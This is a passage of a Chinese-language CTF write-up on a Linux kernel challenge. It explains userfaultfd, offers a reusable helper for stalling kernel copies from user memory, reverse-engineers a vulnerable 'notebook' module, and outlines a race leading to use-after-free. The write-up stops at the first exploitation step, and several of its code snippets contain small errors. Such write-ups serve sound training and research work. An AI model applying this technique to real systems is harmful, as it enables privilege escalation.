Enable the close-on-exec flag for the new userfaultfd file descriptor. See the description of the O_CLOEXEC flag in open(2).

O_NONBLOCK
Enables non-blocking operation for the userfaultfd object. See the description of the O_NONBLOCK flag in open(2).

When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.

Usage
The userfaultfd mechanism is designed to allow a thread in a multithreaded program to perform user-space paging for the other threads in the process. When a page fault occurs for one of the regions registered to the
userfaultfd object, the faulting thread is put to sleep and an event is generated that can be read via the userfaultfd file descriptor. The fault-handling thread reads events from this file descriptor and services
them using the operations described in ioctl_userfaultfd(2). When servicing the page fault events, the fault-handling thread can trigger a wake-up for the sleeping thread.

It is possible for the faulting threads and the fault-handling threads to run in the context of different processes. In this case, these threads may belong to different programs, and the program that executes the
faulting threads will not necessarily cooperate with the program that handles the page faults. In such non-cooperative mode, the process that monitors userfaultfd and handles page faults needs to be aware of the
changes in the virtual memory layout of the faulting process to avoid memory corruption.

Starting from Linux 4.11, userfaultfd can also notify the fault-handling threads about changes in the virtual memory layout of the faulting process. In addition, if the faulting process invokes fork(2), the user‐
faultfd objects associated with the parent may be duplicated into the child process and the userfaultfd monitor will be notified (via the UFFD_EVENT_FORK described below) about the file descriptor associated with the
userfault objects created for the child process, which allows the userfaultfd monitor to perform user-space paging for the child process. Unlike page faults which have to be synchronous and require an explicit or
implicit wakeup, all other events are delivered asynchronously and the non-cooperative process resumes execution as soon as the userfaultfd manager executes read(2). The userfaultfd manager should carefully synchro‐
nize calls to UFFDIO_COPY with the processing of events.

userfaultfd()函数被使用来创建一个结构体,用作用户空间的缺页处理,并返回一个文件描述符,并且该结构体使用ioctl进行配置,配置过后我们就可以使用read函数读取其中的userfaultfd消息,该行为是否会被阻塞取决于创建uffd结构体时的flag值或连续的fcntl调用

我们要使用他,首先需要获得上面这样一个结构体,使用如下代码:

1
long uffd = syscall(_NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

获得这样一个结构体后,我们需要使用ioctl来进行之后的配置、注册内存区域、或者说是缺页处理,其中ioctl的命令参数如下:

  • UFFDIO_REGESTER: 注册一个监视区域
  • UFFDIO_COPY: 上面的区域出现缺页后,使用该命令来像缺页的地址拷贝自定义数据

然后我们需要使用mmap来映射出一片匿名区域,然后将其定义为监视区,再使用iotctl注册该区域

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// 注册时要用一个struct uffdio_register结构传递注册信息:
// struct uffdio_range {
// __u64 start; /* Start of range */
// __u64 len; /* Length of range (bytes) */
// };
//
// struct uffdio_register {
// struct uffdio_range range;
// __u64 mode; /* Desired mode of operation (input) */
// __u64 ioctls; /* Available ioctl() operations (output) */
// };

/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */


addr = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)
// addr 和 len 分别是我匿名映射返回的地址和长度,赋值到uffdio_register
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
// mode 只支持 UFFDIO_REGISTER_MODE_MISSING
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
// 用ioctl的UFFDIO_REGISTER注册
ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);

然后我们就需要启动一个线程进行轮询,来捕获对于我们该页的异常

1
2
3
// 主进程中调用pthread_create创建一个fault handler线程
pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);

一个自定义的线程函数举例如下,这里处理的是一个普通的匿名页用户态缺页,我们要做的是把我们一个已有的一个page大小的buffer内容拷贝到缺页的内存地址处。用到了poll函数轮询uffd,并对轮询到的UFFD_EVENT_PAGEFAULT事件(event)用拷贝(ioctl的UFFDIO_COPY选项)进行处理。

上面一段是我引用Jcix师傅的原话,侵删~~

下面就是我们的fault_handler_thread

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) arg;

/* Create a page that will be copied into the faulting region */

if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}

/* Loop, handling incoming events on the userfaultfd
file descriptor */

for (;;) {

/* See what poll() tells us about the userfaultfd */

struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");

printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);

/* Read an event from the userfaultfd */

nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}

if (nread == -1)
errExit("read");

/* We expect only one kind of event; verify that assumption */

if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* Display info about the page-fault event */

printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);

/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */

memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;

uffdio_copy.src = (unsigned long) page;

/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */

uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");

printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}


我们的整个手册上的测试用例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
/* userfaultfd_demo.c

Licensed under the GNU General Public License version 2 or later.
*/
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>

#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)

static int page_size;

static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) arg;

/* Create a page that will be copied into the faulting region */

if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}

/* Loop, handling incoming events on the userfaultfd
file descriptor */

for (;;) {

/* See what poll() tells us about the userfaultfd */

struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");

printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);

/* Read an event from the userfaultfd */

nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}

if (nread == -1)
errExit("read");

/* We expect only one kind of event; verify that assumption */

if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* Display info about the page-fault event */

printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);

/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */

memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;

uffdio_copy.src = (unsigned long) page;

/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */

uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");

printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}

int
main(int argc, char *argv[])
{
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

if (argc != 2) {
fprintf(stderr, "Usage: %s num-pages\n", argv[0]);
exit(EXIT_FAILURE);
}

page_size = sysconf(_SC_PAGE_SIZE);
len = strtoul(argv[1], NULL, 0) * page_size;

/* Create and enable userfaultfd object */

uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");

/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */

addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");

printf("Address returned by mmap() = %p\n", addr);

/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");

/* Create a thread that will process the userfaultfd events */

s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0) {
errno = s;
errExit("pthread_create");
}

/* Main thread now touches memory in the mapping, touching
locations 1024 bytes apart. This will trigger userfaultfd
events for all pages in the region. */

int l;
l = 0xf; /* Ensure that faulting address is not on a page
boundary, in order to test that we correctly
handle that case in fault_handling_thread() */
while (l < len) {
char c = addr[l];
printf("Read address %p in main(): ", addr + l);
printf("%c\n", c);
l += 1024;
usleep(100000); /* Slow things down a little */
}

exit(EXIT_SUCCESS);
}

情况如下:

我们可以参考到,在mmap之后也就是最上面的红线所得到的地址,我们在第一次访问他时出现了缺页异常,因此我们的轮询线程检测到我们之前定义的监控范围内出现异常,这使得该函数可以继续运行,因此将该内存区域填充A,所以在我们处理完了用户版的缺页异常后,该内存区域内全是A。

说了这么多我们会发现利用他是如此繁琐的一个过程,所以干脆咱们现在来写一个userfaultfd的万能板子,到时候写题就不需要重新回顾这些变量名了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include <unistd.h>            
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>

#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)

static int page_size;

int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
long uffd;
pthread_t thr;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if(uffd == -1)
errExit("userfaultfd");

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");

/* Create a thread that will process the userfaultfd events */
s = pthread_create(&thr, NULL, handler, (void *)uffd);
if(s != 0){
errno = s;
errExit("pthread_create");
}
}

有了上面的代码,我们就可以只需要使用userfaultfd_attack(addr, len, handler)就可以避免刚才咱们的一系列初始化步骤了,之后就是比较重要的handler函数的编写,这一部分更主要的是靠我们在赛时自行思考diy,这里给出较为通用的模板,也就是linux手册上面的,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
static char* page; /* the data you want to overwrite */

static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long)arg;

/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");

/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");

/* We expect only one king of evenr; verify that assuption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(strerr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* copy things to the addr */

uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
* So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);

uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
}


2. 题目逆向

首先,启动脚本

1
2
3
4
5
6
7
8
9
qemu-system-x86_64 -m 64M \
-kernel bzImage \
-initrd rootfs.cpio \
-append "loglevel=0 console=ttyS0 oops=panic panic=1 kaslr" \
-nographic \
-net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
-monitor /dev/null 2>/dev/null -s \
-no-reboot

  1. 双核双线程
  2. 开启kaslr
  3. smep/smap开启
  4. kpti开启

:disappointed: 很特么绝望,跟uesrland第一次看到保护全开一片绿的感觉,然后我们查看文件系统的init脚本,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts

mount -t proc proc /proc
mount -t sysfs sysfs /sys

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifup eth0 > /dev/null 2>/dev/null

chown root:root /flag
chmod 600 /flag

insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
#poweroff -d 300 -f &
echo "Welcome to QWB!"

#sh
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -d 1 -n -f

发现插入了一个notebook.ko模块,然后我们运行该内核看看基本情况

1
2
3
4
5
6
7
/ $ uname -a
Linux (none) 4.15.8 #3 SMP Thu Jun 3 01:01:56 PDT 2021 x86_64 GNU/Linux
/ $ lsmod
Module Size Used by Tainted: G
notebook 16384 0
/ $ dmesg
dmesg: klogctl: Operation not permitted

可以看到令我们欣慰的一点是内核版本还不算很高 :happy:,然后我们打开ida反编译一下notebook.ko看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
.rodata:0000000000000800                               ; ===========================================================================
.rodata:0000000000000800
.rodata:0000000000000800 ; Segment type: Pure data
.rodata:0000000000000800 ; Segment permissions: Read
.rodata:0000000000000800 _rodata segment align_32 public 'CONST' use64
.rodata:0000000000000800 assume cs:_rodata
.rodata:0000000000000800 ;org 800h
.rodata:0000000000000800 ; const file_operations mynote_fops
.rodata:0000000000000800 C0 09 00 00 00 00 00 00 00 00+mynote_fops file_operations <offset __this_module, 0, 0, offset mynote_write, 0, 0, 0, 0, 0, \
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+ ; DATA XREF: .data:mynote_dev↓o
.rodata:0000000000000800 00 00 00 00 80 00 00 00 00 00+ offset mynote_ioctl, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+_rodata ends
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+
__mcount_loc:00000000000008F8 ; ===========================================================================
__mcount_loc:00000000000008F8
__mcount_loc:00000000000008F8 ; Segment type: Pure data
__mcount_loc:00000000000008F8 ; Segment permissions: Read
__mcount_loc:00000000000008F8 __mcount_loc segment qword public 'CONST' use64
__mcount_loc:00000000000008F8 assume cs:__mcount_loc
__mcount_loc:00000000000008F8 ;org 8F8h
__mcount_loc:00000000000008F8 00 00 00 00 00 00 00 00 dq offset mynote_read
__mcount_loc:0000000000000900 80 00 00 00 00 00 00 00 dq offset mynote_write
__mcount_loc:0000000000000908 10 01 00 00 00 00 00 00 dq offset noteadd
__mcount_loc:0000000000000910 00 02 00 00 00 00 00 00 dq offset notedel
__mcount_loc:0000000000000918 80 02 00 00 00 00 00 00 dq offset noteedit
__mcount_loc:0000000000000920 90 03 00 00 00 00 00 00 dq offset notegift
__mcount_loc:0000000000000928 E0 03 00 00 00 00 00 00 dq offset mynote_ioctl
__mcount_loc:0000000000000930 74 04 00 00 00 00 00 00 dq offset mynote_init
__mcount_loc:0000000000000930 __mcount_loc ends

一个一个看吧 :bomb:

mynote_init

本身为加载一个misc设备的初始化函数,如下:

1
2
3
4
5
6
7
8
9
10
int __cdecl mynote_init()
{
int v0; // ebx

_fentry__();
v0 = misc_register(&mynote_dev); //内核维护一个misc_list链表,misc设备在misc_register注册的时候链接到这个链表
_rwlock_init(&lock, "&lock", &krealloc); //初始化一个读写锁
printk("Welcome to BrokenNotebook!\n");
return v0;
}

这里涉及到一个Linux中读写锁rwlock的概念

rwlock 主要有以下几种特征:

  • 多进程对临界区的读不互斥,可同步进行,互不影响
  • 如果要执行写,需要等所有的读者退出才能执行写操作
  • 如果正在执行写操作且未完成,这一阶段发生的读操作会被阻塞,即读写互斥
  • 如果正在执行写操作且未完成,这一阶段发生的读操作会被阻塞,即写写互斥
  • 不造成睡眠,等待形式是自旋

这种场景有点像行人过马路,公交车司机必须停在斑马线前等待所有行人过完马路才能继续往前开,在繁忙的时段,不断地有行人走过,就会导致公交车一直止步不前,甚至造成堵车。

这也是 rwlock 的一大缺点:写者优先级太低,在极端情况下甚至出现饿死的情况,也即是说该锁是一个读优先锁

mynote_exit

撤销该驱动时的退出函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void __cdecl mynote_exit()
{
note *v0; // rbx
void *note; // rdi

v0 = notebook;
do
{
note = v0->note;
++v0;
kfree(note);
}
while ( v0 != &notebook[16] );
misc_deregister(&mynote_dev);
}

mynote_ioctl

覆盖了ioctl函数,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
__int64 __fastcall mynote_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
__int64 v3; // rdx
userarg notearg; // [rsp+0h] [rbp-28h] BYREF

_fentry__(file, cmd, arg);
copy_from_user(&notearg, v3, 24LL);
if ( cmd == 0x100 )
return noteadd(notearg.idx, notearg.size, notearg.buf);
if ( cmd <= 0x100 )
{
if ( cmd == 0x64 )
return notegift(notearg.buf);
}
else
{
if ( cmd == 0x200 )
return notedel(notearg.idx);
if ( cmd == 0x300 )
return noteedit(notearg.idx, notearg.size, notearg.buf);
}
printk("[x] Unknown ioctl cmd!\n");
return -100LL;
}

我们得以知道在调用ioctl函数时,首先需要传递一个大小为24字节的数据结构,然后将其复制到上面的notearg当中,然后存在下面几个选项

notearg(0x18)
idx(0x8)
size(0x8)
buf(0x8)
  1. 0x100:以notearg为参数,调用noteadd,也就是添加notebook;
  2. 0x64:调用notegift, 泄露notebook数组内容, 该notebook就是note数据结构作为元素的数组,里面包含了一系列内核地址,也就是说kaslr不值一提😊
  3. 0x200:调用notedel, 根据idx来删除对应内核堆块,以及notebook相应的idx中的size来确定是否置空指针来置空指针,这里是因为其size在del的时候不可为0,即使使用noteedit
  4. 0x300:以notearg为参数,调用noteedit,用来修改notebook单元中的size(不可为0)和note字段

这里我们还有一个notebook的数据结构

note
note
size

noteadd(read_lock)

使用我们传入的userarg结构体,其中要求idx不能大于0xF,以及size不能大于0x60,还有就是本身的note指针不能有值,不然都会直接返回

若上述条件均满足,我们就可以将我们userarg中的buf参数值传递给内核bss段上的name了,注意这里并不是note的值,此时内核就会使用kmalloc(size, _GFP*)来申请一个object给我们notebook对应下标的note值,这里使用了读锁,但并没太大关系

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
__int64 __fastcall noteadd(size_t idx, size_t size, void *buf)
{
__int64 content_0; // rdx
__int64 content_1; // r13
note *note_addr; // rbx
size_t orig_size; // r14
__int64 ret_value; // rbx

(_fentry__)(idx, size, buf);
if ( idx > 0xF ) //idx最大0xF
{
ret_value = -1LL;
printk("[x] Add idx out of range.\n");
}
else
{
content_1 = content_0;
note_addr = &notebook[idx]; //notebook为bss段上的值,这里是取相应idx对应的地址
raw_read_lock(&lock);
orig_size = note_addr->size; //取本来地址块的size位,用来进行可能的还原
note_addr->size = size; //填入我们传入的size
if ( size > 0x60 ) //如果说size大于0x60,则进行还原size
{
note_addr->size = orig_size;
ret_value = -2LL;
printk("[x] Add size out of range.\n");
}
else
{
copy_from_user(name, content_1, 256LL); //该name也是一个bss上的值,此时将我们的传递的notearg.buf传递给他
if ( note_addr->note ) //若本身存在note,依然还原size
{
note_addr->size = orig_size;
ret_value = -3LL;
printk("[x] Add idx is not empty.\n");
}
else
{
note_addr->note = _kmalloc(size, 0x24000C0LL); //内核分配块
printk("[+] Add success. %s left a note.\n", name);
ret_value = 0LL;
}
}
raw_read_unlock(&lock);
}
return ret_value;
}

notegift

该法会将notebook的内容传递给我们的userarg.buf,出题人很温柔:hibiscus:

1
2
3
4
5
6
7
8
__int64 __fastcall notegift(void *buf)
{
_fentry__(buf);
printk("[*] The notebook needs to be written from beginning to end.\n");
copy_to_user(buf, notebook, 256LL); //传递内核地址给用户奥,太棒了
printk("[*] For this special year, I give you a gift!\n");
return 100LL;
}

notedel(write_lock)

通过给定的idx来删除堆块,这里我们看到,首先是一个加了一个写锁,很难绷,然后获取相应idx的note后,调用kfree,挂在kmem_cache上?然后根据size来判断是否将对应位清0,但是按照正常单线程的话这个值不会为0的,即使调用noteedit也不会出现这种情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
__int64 __fastcall notedel(size_t idx)
{
note *v1; // rbx

_fentry__(idx);
if ( idx > 0x10 )
{
printk("[x] Delete idx out of range.\n");
return -1LL;
}
else
{
raw_write_lock(&lock);
v1 = &notebook[idx];
kfree(v1->note);
if ( v1->size ) //v1->size不为0才会清空
{
v1->size = 0LL;
v1->note = 0LL;
}
raw_write_unlock(&lock);
printk("[-] Delete success.\n");
return 0LL;
}
}

mynote_read

读notebook的内容奥,这时我们将读取我们rdx参数指向的对应note至我们的buf那儿

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx

_fentry__(file, buf, idx);
if ( v4 > 0x10 )
{
printk("[x] Read idx out of range.\n");
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 1LL);
copy_to_user(buf, note, size);
printk("[*] Read success.\n");
return 0LL;
}
}

mynote_write

可以看到,这里我们才是真正的写入了note结构体中的note字段,即使在addnote的时候我们也并没有在其中赋值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx

_fentry__(file);
if ( v4 > 0x10 )
{
printk("[x] Write idx out of range.\n", buf);
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 0LL);
if ( copy_from_user(note, buf, size) )
printk("[x] copy from user error.\n");
else
printk("[*] Write success.\n");
return 0LL;
}
}

noteedit(read_lock)

有读锁,我们的新name是我们的userarg.buf,然后我们会调用krealloc来重新分配堆块,这里会判断size是否为0,所以我们也无法通过传递size为0来使用UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size; // rax
__int64 v7; // r12
__int64 v8; // rbx

_fentry__(idx);
if ( idx > 0xF )
{
v8 = -1LL;
printk("[x] Edit idx out of range.\n", newsize);
return v8;
}
v4 = v3;
v5 = &notebook[idx];
raw_read_lock(&lock);
size = v5->size;
v5->size = newsize;
if ( size == newsize )
{
v8 = 1LL;
goto editout;
}
v7 = (*krealloc.gap0)(v5->note, newsize, 37748928LL); //用于重新为让p执行一段新申请的内存,但是保持p指针指向内存中的内容不变,通俗讲就是为p重新申请一段内存,再将p之前内存中的内容复制过来.如果说此时newsize为0,则会释放该堆块,且不做任何操作
copy_from_user(name, v4, 256LL);
if ( !v5->size ) //传0是不阔以哒
{
printk("free in fact");
v5->note = 0LL;
v8 = 0LL;
goto editout;
}
if ( _virt_addr_valid(v7) )
{
v5->note = v7;
v8 = 2LL;
editout:
raw_read_unlock(&lock);
printk("[o] Edit success. %s edit a note.\n", name);
return v8;
}
printk("[x] Return ptr unvalid.\n");
raw_read_unlock(&lock);
return 3LL;
}

3. 利用思路

Krealloc , pwn:v:肯定有点熟悉这个realloc,在这里也是类似的,他的功能就是重新分配堆块,如果传入size为0,则会释放掉他。

我们之前经过分析,这个notedel好像可以使得size为0,然后UAF,事实上也确实如此。

接下来我们试想这样一个场景:

  1. 存在线程1,线程2,并且其都会通过copy from user or copy to user for accessing the userland.
  2. 也就是说可以满足我们访问用户区域的条件,此时虽然存在多线程问题,但是触发条件十分艰巨,也就是说我们想要触发我们希望的修改条件,让他们自己跑的话是十分复杂且困难的,就拿两个线程来说,我们需要满足线程1在执行完语句n之后,需要线程2立刻执行自己区域的语句z,然后再回到线程1执行n+1.我们可以料想到这是有多么复杂
  3. 一切都要归于时间片,他实在是太短且不太好预测,所以线程切换的时间也不是我们可以任意控制的,因此我们可以想到,如果让线程1再执行到需要语句的时候即使阻塞呢,然后再调用了线程2,这样就可以达成我们需要的调用链
  4. 因此这里我们采用userfaultfd来达成该效果,调用监听线程来使得某线程阻塞,无限拉大线程切换的过程,使我们有足够的时间来做小动作

4.漏洞利用

:one: 使用mmap构造匿名映射区域,将其传入内核,并且将该区域使用userfaultfd来进行监控,到适当时间我们就将他阻塞

